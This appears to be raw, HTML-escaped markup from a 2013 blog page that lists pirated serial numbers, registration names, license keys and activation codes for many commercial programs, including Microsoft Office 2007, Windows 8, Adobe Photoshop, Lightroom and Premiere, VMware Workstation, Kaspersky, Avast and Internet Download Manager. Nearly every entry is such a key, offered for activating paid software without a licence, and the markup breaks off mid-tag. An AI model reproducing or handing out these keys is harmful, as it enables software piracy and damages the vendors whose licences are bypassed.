&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Window’s Voice Welcome!&quot;&gt;&lt;strong&gt;TraceRoute 2.0.2&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;s/n: Key-B03-30-230-209-164-3899&lt;/li&gt;
&lt;li&gt;s/n: Key-B03-30-230-209-164-3899&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Some Impotant Things Must Know If Using Iphone!!&quot;&gt;&lt;strong&gt;Adobe Photoshop CS3 Master Collection Serial&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;1325-1164-8142-5014-6460-3938&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Top 10 Essential Google Search Shortcuts&quot;&gt;&lt;strong&gt;Microsoft office 2007 enterprise 32 bit&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: F3DJD-6FFQ4-XQTQF-PGK47-8MDQ8&lt;/li&gt;
&lt;li&gt;CM9R7-9X4DV-F43J4-JVC67-GYDQ8&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://v/&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Change Your Ip Address – Every 10 seconds&quot;&gt;&lt;strong&gt;MP3 Encoder 1.0&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;s/n: _23456789a_ydcgwvaf&lt;/li&gt;
&lt;li&gt;s/n: _23456789a_ydcgwvaf&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Direct Download Youtube Videos in mp4 Format&quot;&gt;&lt;strong&gt;Nitro PDF Professional Enterprise 8 v8.0.6.3&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;NP8D95K4GG0610986CC&lt;/li&gt;
&lt;li&gt;NP8D28K08K861091A52&lt;/li&gt;
&lt;li&gt;NP8D8F04GSK619D6560&lt;/li&gt;
&lt;li&gt;NP8D98G4XKS61068817&lt;/li&gt;
&lt;li&gt;NP8DD60C8S061FC5394&lt;/li&gt;
&lt;li&gt;NP8D23CX8C8612FA36D&lt;/li&gt;
&lt;li&gt;NP8DCD8GOK4610DCCA4&lt;/li&gt;
&lt;li&gt;NP8D03S4SGK612D6DA0&lt;/li&gt;
&lt;li&gt;NP8D772561161D133E8&lt;/li&gt;
&lt;li&gt;NP8D764G84C61247501&lt;/li&gt;
&lt;li&gt;NP8D2F4KXC861F6DFBA&lt;/li&gt;
&lt;li&gt;NP8D03C80SK613F59AA&lt;/li&gt;
&lt;li&gt;NP8D20KSX08613BF266&lt;/li&gt;
&lt;li&gt;NP8DCD4COS46100F9C6&lt;/li&gt;
&lt;li&gt;NP8D52G00O0614E8C6C&lt;/li&gt;
&lt;li&gt;NP8D772561161D133E8&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Web Designer/Hosting&quot;&gt;&lt;strong&gt;Flash Player Pro v5.4&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: LiveLong&lt;/li&gt;
&lt;li&gt;Serial: LdfFla-23B9AC7E23E323AA6E448A9BD65AADFB&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-download-paid-android-apps-for.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Guest Post&quot;&gt;&lt;strong&gt;TuneUp Utilities 2013 v13.0.2020.15&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;FC661R-DA19J6-9WFX5T-79RYJX-DX6T1Y-A9K5E3&lt;/li&gt;
&lt;li&gt;WVACTK-RNWVQ9-AK1YVC-Y07WYB-TB9Y5H-FVHFA8&lt;/li&gt;
&lt;li&gt;C9ATBK-F4CXJE-H60MH3-NHXPKQ-80RPB9-0KF6V2&lt;/li&gt;
&lt;li&gt;99VV7M-KRN8PK-4PDPX4-KY9Y7T-Q7TQ34-WJ5AKD&lt;/li&gt;
&lt;li&gt;HNBHQA-B3QEWW-4Y6TWC-KXDRT8-QR4591-CRTV8H&lt;/li&gt;
&lt;li&gt;9H2JWP-YPKKAM-3M8TAD-J82PYB-55WMFN-N5K428&lt;/li&gt;
&lt;li&gt;8DRYX9-B4AKRK-CTH3TE-N0QFY1-RX777P-TTRKC6&lt;/li&gt;
&lt;li&gt;MWETXX-RA0TAM-J570RF-YFHNW9-VMEVV0-60666M&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/automatically-poke-back-on-facebook.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Make Your Laptop A Wifi Hotspot – By CMD&quot;&gt;&lt;strong&gt;Kaspersky Internet Security 2013&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Use One Of This&amp;nbsp;Activation Code&amp;nbsp;To Get 90 Days License ??&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;4GGYH-S7HEJ-QEGXT-4C88H&lt;/li&gt;
&lt;li&gt;(OR)&lt;/li&gt;
&lt;li&gt;QCGUH-J8FF6-33WGA-UBY62&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/automatically-poke-back-on-facebook.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How to Crack Windows Administrator Password – Without Loosing Any Data&quot;&gt;&lt;strong&gt;Hide Files and Folders v3.5&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;a66e44fe14a7fcd5&lt;/li&gt;
&lt;li&gt;be8054ffac8c3d28&lt;/li&gt;
&lt;li&gt;3d5cbbdd6049fe6b&lt;/li&gt;
&lt;li&gt;788887cd0bbcf8e2&lt;/li&gt;
&lt;li&gt;fd434bde7a94fe93&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/top-highest-paying-google-adsense.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Top 5 Useful Mozilla Firefox Addons&quot;&gt;&lt;strong&gt;Avast! AntiVirus v7.0.11 License Key Expiry Date&lt;/strong&gt;&lt;strong&gt;(2038)&amp;nbsp;&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;C2092321R9946A0912-U52DEWK3&lt;/li&gt;
&lt;li&gt;OR&lt;/li&gt;
&lt;li&gt;C2092321R9946A0912-U52DEWK3&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/top-highest-paying-google-adsense.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Htc One Max Vs Samsung Galaxy Note 3 – Great Future Launches&quot;&gt;&lt;strong&gt;TeamViewer Premium 5.1.9290 serial number&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;s/n: 09-31004-61457-936046&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/top-highest-paying-google-adsense.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Firefox Os Smartphones&quot;&gt;&lt;strong&gt;Photoshine Serial Key&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;name :ACPJ0020C4E&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
serial : A0JJ8022CFB&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/top-highest-paying-google-adsense.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Facebook And Google hoist Rainbow Flag in support of “Gay Rights”&quot;&gt;&lt;strong&gt;Adobe Photoshop Lightroom v4.3&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: mahn&lt;/li&gt;
&lt;li&gt;Serial: 1160-4808-4026-5497-2931-5822&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: Flash Gordon&lt;/li&gt;
&lt;li&gt;Serial: 1160-4859-8564-6751-6040-3185&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: Green Lantern&lt;br /&gt;Serial: 1160-4254-4822-7250-4150-5688&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/top-highest-paying-google-adsense.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Tizen Os May Be A Challenge to Android!!&quot;&gt;&lt;strong&gt;ImTOO Video Converter Ultimate v7.7.0.20121224&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;3A17-E5E5-C390-A079-39A9-E3EA-80A4-6C62&lt;/li&gt;
&lt;li&gt;CB28-7E7E-5CA1-B182-F8A7-0041-D754-4B55&lt;/li&gt;
&lt;li&gt;A5C6-1818-3A4F-5F69-E202-75D0-89ED-FC87&lt;/li&gt;
&lt;li&gt;C3A1-7E8E-5C39-3A00-7C33-822B-389B-44D3&lt;/li&gt;
&lt;li&gt;1BC5-E0E7-92BC-BC56-1161-A53D-F9E7-918D&lt;/li&gt;
&lt;li&gt;A18F-5C6C-3A17-18EB-34FC-2042-46A4-5695&lt;/li&gt;
&lt;li&gt;816C-5A5A-38E7-17C3-9E64-05A5-257B-02BF&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;About Us&quot;&gt;&lt;strong&gt;Microsoft Windows 8 RTM Key&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;6CNK2-RTVRV-TXYQK-86DBM-B4DHC&lt;/li&gt;
&lt;li&gt;3HBY3-3GNXP-22R96-CCMCB-HT67C&lt;/li&gt;
&lt;li&gt;KGQND-Q2HH6-XHXHC-89VWW-82KVC&lt;/li&gt;
&lt;li&gt;F2V7V-8WN76-77BPV-MKY36-MKH3P&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Techno Affiliates&quot;&gt;&lt;strong&gt;Internet Download Manager v6.14.3&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;First Name: Any Name&lt;/li&gt;
&lt;li&gt;Last Name: Any Name&lt;/li&gt;
&lt;li&gt;Email: Any Email&lt;/li&gt;
&lt;li&gt;Serials:&lt;/li&gt;
&lt;li&gt;7G7QY-NZWKQ-23KRA-RAMQ4&lt;/li&gt;
&lt;li&gt;D4B22-SWRY9-FLFVP-NETDI&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google Will Pay You To Travel The World&quot;&gt;&lt;strong&gt;Any Video Converter Ultimate v4.5.8&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: LiveLong&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Serial: 0000KZ-KFQ4Q5-21UJ38-7AB787-812BM7-209R1A-DNTPG7&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;If You Are Human Just Watch This – You Will Be Proud To See Orignal Human&quot;&gt;&lt;strong&gt;Super DVD Factory v5.7&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: freeserialkey&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Serial: 1199BA01C9C8B64244B4A42A662A723A2CBF089A005BE4CF26AE68FCCF22992A0E9CF910CF06804A6686148DFD58C8293818E5268FB78439C578DAAD2A87BFFF2F60CC40A24D7C4707A8A8A572431074A008160333830C862C73D3BAC576CF11803C0D84142979EC5834921FE9C4E63896150A4F3EC32C61028A1F493D0003C5&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Registration keys for some popular softwares&quot;&gt;&lt;strong&gt;VMware Workstation v9.X&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF&lt;/li&gt;
&lt;li&gt;VY19K-01X5L-084MY-MXMZG-MAUF2&lt;/li&gt;
&lt;li&gt;YA5X2-FEFDK-H80VQ-4YWQC-MPARD&lt;/li&gt;
&lt;li&gt;YU1WA-F1GD7-485UQ-ADNNT-XCAR6&lt;/li&gt;
&lt;li&gt;GF1WR-FGZ5J-485RY-JGQQC-XZ2G8&lt;/li&gt;
&lt;li&gt;AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2&lt;/li&gt;
&lt;li&gt;YG5EK-D1X8L-088XY-NNQEC-P3AW6&lt;/li&gt;
&lt;li&gt;VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8&lt;/li&gt;
&lt;li&gt;ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6&lt;/li&gt;
&lt;li&gt;GC1WK-F8XEM-M812P-9WMG9-XUU9F&lt;/li&gt;
&lt;li&gt;AY540-00W0M-088DY-GDQ7T-QL8Z8&lt;/li&gt;
&lt;li&gt;FF34U-A5W11-H80UP-F6WNV-NL8V6&lt;/li&gt;
&lt;li&gt;CF71K-AGD52-H894Q-Q4P7E-XL2R6&lt;/li&gt;
&lt;li&gt;YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/windows-7-ultimate-sp1-x86-en-us-pre.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Apple iphone 5 Review&quot;&gt;&lt;strong&gt;Internet Download Manager v6.15.1 Serial&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;First Name: Anything&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Last Name: Anything&lt;br /&gt;
Email: Anything&lt;br /&gt;
Serial: 7G7QY-NZWKQ-23KRA-RAMQ4&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/online-money-get-paid-for-sharing-your.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How To Lock Computer With USB Flash Drive?&quot;&gt;&lt;strong&gt;Active Partition Recovery Enterprise v8.0&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot; style=&quot;background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;&quot;&gt;RegistEred Name&lt;/span&gt;:&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot; style=&quot;background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;&quot;&gt;Bernhard&lt;/span&gt;&amp;nbsp;Walder&lt;/li&gt;
&lt;li&gt;Registration&amp;nbsp;Key: 00001Q-RB25T2-24ZXFW-WVDC84-RCD4EQ-YWMDZ6-MD61TD-VQ4VMU-87UDC3-5JB9DX-8NJMPA&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/online-money-get-paid-for-sharing-your.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google’s New Fast Internet Service For Rural Areas-”Project Loon”&quot;&gt;&lt;strong&gt;Advanced Archive Password Recovery Pro v4.53&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ARCHPRP-NWGTN-45653-DXZWD-93326&lt;/li&gt;
&lt;li&gt;ARCHPRP-LEHKE-58253-RHCZW-73269n&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/online-money-get-paid-for-sharing-your.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Window’s Voice Welcome!&quot;&gt;&lt;strong&gt;FutureDecks DJ Pro v3.0.5&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;759P4A3S56MN&lt;/li&gt;
&lt;li&gt;M669C575KC43&lt;/li&gt;
&lt;li&gt;L7NNSFL5MPPK&lt;/li&gt;
&lt;li&gt;99765CLCKHK5&lt;/li&gt;
&lt;li&gt;F9K65L35C5C5&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/online-money-get-paid-for-sharing-your.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Wanna know your computer is a ‘MALE’ or ‘FEMALE’..!!&quot;&gt;&lt;strong&gt;Virtual DJ 6&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: WBBS-UCHF-UBBLG&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;strong&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot; style=&quot;background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;&quot;&gt;Sony Sound Forge&lt;/span&gt;&lt;span style=&quot;color: #555555;&quot;&gt;&amp;nbsp;7.0.0.262&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;SN : HQ-EM4R8P-7S407G-S93NCR&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/fake-likes-for-your-facebook-post.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;China Mobile’s Codes&quot;&gt;&lt;strong&gt;ADOBE PREMIERE PRO CS4 SERIAL KEYS&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;1132-1033-0380-3409-5427-6334&lt;/li&gt;
&lt;li&gt;1132-1686-5385-1891-1718-6945&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
